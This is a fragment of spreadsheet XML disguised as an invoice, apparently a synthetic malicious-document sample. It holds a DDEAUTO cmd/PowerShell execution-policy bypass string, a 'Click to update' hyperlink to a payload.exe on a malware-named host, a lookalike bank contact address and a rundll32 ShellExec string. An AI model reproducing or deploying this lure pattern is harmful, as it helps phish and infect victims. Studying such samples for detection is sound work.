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DDEAUTO cmd.exe powershell -ExecutionPolicy bypass</t>
        </is>
      </c>
      <c r="B1" t="inlineStr">
        <is>
          <t>Invoice Total</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2">
        <f>HYPERLINK("http://malware-download.ru/payload.exe","Click to update")</f>
        <v/>
      </c>
      <c r="B2" t="n">
        <v>15432</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" t="inlineStr">
        <is>
          <t>Contact: billing@secure-bank.xyz</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" t="inlineStr">
        <is>
          <t>rundll32.exe shell32.dll,ShellExec_RunDLL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2026-08-13T11:49:07Z</dcterms:created>
  <dcterms:modified xmlns:dcterms="http://purl.org/dc/terms/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="dcterms:W3CDTF">2026-08-13T11:49:07Z</dcterms:modified>
</cp:coreProperties>
</file>